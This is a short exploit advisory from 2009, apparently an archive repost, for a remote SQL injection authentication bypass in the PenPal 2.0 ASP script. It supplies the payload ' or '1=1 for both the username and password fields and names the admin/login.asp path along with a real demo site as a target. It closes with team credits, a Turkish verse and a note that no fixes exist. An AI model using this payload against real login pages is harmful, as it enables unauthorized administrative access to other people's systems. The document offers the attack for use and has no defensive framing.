PenPal 2.0 (Auth Bypass) Remote SQL Injection Vulnerability

2009-02-25 16:34:39

@~~=======================================~~@
====C4TEAM.ORG====ByALBAYX====C4TEAM.ORG=====
@~~=======================================~~@
@~~=Author : ByALBAYX

@~~=Website : WWW.C4TEAM.ORG

@~~=From : Turkish
@~~=======================================~~@
@~~=Script :PenPal v2.0

@~~=S.Site :http://anblik.com

@~~=Download :http://www.anblik.com/store/asp-scripts/penpal.html

@~~=Demo :http://penpal.ankoor.com

@~~=Price :1200.00 USD
@~~=======================================~~@

@~~=Exploit:

@~~=Username: ' or '1=1

@~~=Password: ' or '1=1


@~~=http://c4team.org /PenPal v2.0_Path /admin/login.asp


@~~=Demo:

@~~=http://penpal.ankoor.com/admin/login.asp

vs..
@~~=======================================~~@
@~~=Greetz For

@~~=Str0ke & Kralman & Mrabah12R & K3vin Mitnick & web-terrorist & Silent & SpotGang
@~~=======================================~~@
Derdimi dinledim, derdimden iGRENDiM...
Onun derdini gordum, derdime iMRENDiM...
FilistiN
@~~=======================================~~@

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.